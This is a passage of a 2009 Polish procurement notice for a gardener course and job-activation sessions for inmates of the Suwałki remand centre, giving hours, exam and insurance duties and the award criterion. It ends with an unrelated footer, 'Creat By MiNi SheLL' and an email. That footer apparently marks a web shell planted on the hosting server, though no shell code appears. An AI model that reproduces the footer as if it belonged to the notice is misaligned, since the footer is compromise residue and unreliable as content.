d)	Koszty egzaminów dla osób uczestniczących poniesie wykonawca.
e)	Celem szkolenia jest teoretyczne i praktyczne przygotowanie osób szkolonych zgodnie z tematyką kursu, oraz nabycie umiejętności zawodowych. Wykonawca przygotuje uczestników kursu do wykonywania pracy w zawodzie ogrodnika terenów zieleni w tym m.in.: przygotowanie terenu do prowadzenia robót ziemnych, przygotowanie gleby pod nowe nasadzenia, nawożenie, sadzenie, przycinanie drzew, krzewów, obsadzanie kwietników kwiatami rabatowymi, prace ogrodnicze wykonywane na trawnikach, prace porządkowe na terenach zieleni..
f)	Szkolenie winno obejmować łącznie 110 godzin (40 godzin zajęć teoretycznych i 70 godzin zajęć praktycznych). Program szkolenia, winien być zgodny z rozporządzeniem Ministra Edukacji i Nauki   z 3 lutego 2006 r. w sprawie kwalifikacji zawodowych w formach pozaszkolnych (Dz. U. z 2006 r. Nr 31, poz. 216).
g)	Kurs musi zakończyć się wydaniem dokumentu potwierdzającego ukończenia kursu zgodnego z jego programem. Wydane absolwentom kursu dokumenty ukończenia kursu winny zawierać informację o realizowaniu szkolenia w ramach projektu współfinansowanego przez Unię Europejską ze środków Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki.
h)	Wykonawca ubezpieczy w niezbędnym zakresie (OC, NNW) wszystkich uczestników kursu przed rozpoczęciem zajęć - kopie polis przekaże zamawiającemu.
i)	Realizacja szkolenia powinna odbywać się w oparciu o nowoczesne metody i techniki dydaktyczno - pedagogiczne.
j)	Wykonawca przekaże Beneficjentom Ostatecznym skierowanym przez zamawiającego materiały szkoleniowe umożliwiające prawidłowe przygotowanie się do egzaminu końcowego.
k)	Materiały szkoleniowe oraz dokumenty szkolenia należy oznakować poprzez umieszczenie logo UE i EFS oraz informacji o środkach współfinansowania projektu. Do dokumentów szkolenia należy załączyć pokwitowanie odbioru materiałów szkoleniowych, w którym zostaną wymienione materiały szkoleniowe otrzymane przez uczestników.
l)	Zajęcia będą odbywały się w godz. od 8:30 do 16:30 z przerwą na obiad od 12:30 do 13:30
m)	Wykonawca zobowiązany jest do przeprowadzenia egzaminu końcowego i wydania uczestnikom kursu, którzy uzyskają z egzaminu ocenę wyższą od niedostatecznej, zaświadczeń o ukończeniu kursu zgodnych z Rozporządzeniem Ministra Edukacji i Nauki z dnia 3 lutego 2006 r. w sprawie uzyskania i uzupełniania przez osoby dorosłe wiedzy ogólnej i kwalifikacji zawodowych w formach pozaszkolnych (Dz. U. z 2006 r. Nr 31, poz. 216 z późn. Zm.)
n)	Wykonawca zobowiązany jest do bieżącej, wewnętrznej kontroli szkolenia mającej na celu podnoszenie jakości szkolenia.
o)	Wykonawcy będzie przysługiwało prawo do wynagrodzenia za faktycznie przeszkoloną ilość osób.
p)	Z tytułu zmniejszenia wielkości zamówienia Wykonawcy nie będą przysługiwały żadne roszczenia finansowe ani prawne..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 11.12.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Część III - zajęcia aktywizacji zawodowej - CPV 80570000-0.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest zorganizowanie czterech cykli aktywizacji zawodowej łącznie dla 48 osadzonych (równolegle 4 cykle po 12 osób). 

Wymagania i warunki realizacji zamówienia stawiane Wykonawcy:

a)	Zajęcia odbywać się będą na terenie Aresztu Śledczego w Suwałkach z wykorzystaniem pracowni komputerowo - multimedialnej na 11 stanowisk.
b)	Zajęcia będą odbywały się w godz. od 8:30 do 16:30 z przerwą na obiad od 12:30 do 13:30
c)	Wykonawca zobowiązany jest zapewnić uprawnionych wykładowców, podręczniki, skrypty i środki dydaktyczne niezbędne do realizacji zajęć.
d)	Przewidywana liczba godzin w ramach 1 cyklu Aktywizacji Zawodowej - 10 godzin zajęć grupowych oraz po 2 godziny zajęć indywidualnych na każdego uczestnika. 
e)	Program powinien obejmować, co najmniej następujące tematy:
-  Zajęcia grupowe (planowanie rozwoju kariery zawodowej, metody poszukiwania pracy, pisanie dokumentów aplikacyjnych z wykorzystaniem technik komputerowych, proces rekrutacyjny w tym przygotowanie do rozmowy kwalifikacyjnej),
 - Zajęcia indywidualne (testy, badania predyspozycji, tworzenie indywidualnego planu rozwoju ścieżki zawodowej).
f)	Wykonawca zobowiązany jest do bieżącej, wewnętrznej kontroli szkolenia mającej na celu podnoszenie jakości szkolenia.
g)	Wykonawcy będzie przysługiwało prawo do wynagrodzenia za faktycznie przeszkoloną ilość osób.
h)	Z tytułu zmniejszenia wielkości zamówienia Wykonawcy nie będą przysługiwały żadne roszczenia finansowe ani prawne..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.57.00.00-0.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com